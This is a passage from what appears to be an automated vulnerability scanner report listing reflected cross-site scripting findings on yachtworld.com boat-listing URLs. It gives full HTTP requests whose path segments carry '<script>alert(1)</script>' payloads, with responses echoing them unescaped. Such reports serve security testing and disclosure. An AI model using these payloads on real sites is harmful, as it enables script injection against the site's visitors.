P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!-- this file is generated automatically -->
<!-- any changes you make will be written over -->
<html>
<head>
<TITLE>Bluewater Yacht Sales (Hampton, VA)</TITLE>
<META name="keywords" content
...[SNIP]...
<INPUT TYPE="hidden" NAME="office_id" VALUE="7582925d7"><script>alert(1)</script>61a123d4d1a">
...[SNIP]...

3.89. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b36c4"><script>alert(1)</script>0acf81a8360 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-1930392/Toms-Riverb36c4"><script>alert(1)</script>0acf81a8360/NJ/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:52 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 25 Jan 2011 16:08:22 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:51 GMT
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=1930392&boat_id=1930392&back=/core/boats/2004/Regulator-32-Fs-1930392/Toms-Riverb36c4"><script>alert(1)</script>0acf81a8360/NJ/United-States&boat_id=1930392">
...[SNIP]...

3.90. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17efc"><script>alert(1)</script>29999bc62e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ17efc"><script>alert(1)</script>29999bc62e/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:25 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 25 Jan 2011 16:08:22 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:25 GMT
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=1930392&boat_id=1930392&back=/core/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ17efc"><script>alert(1)</script>29999bc62e/United-States&boat_id=1930392">
...[SNIP]...

3.91. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db200"><script>alert(1)</script>b62163eb756 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-Statesdb200"><script>alert(1)</script>b62163eb756 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:05:00 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 25 Jan 2011 16:08:22 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%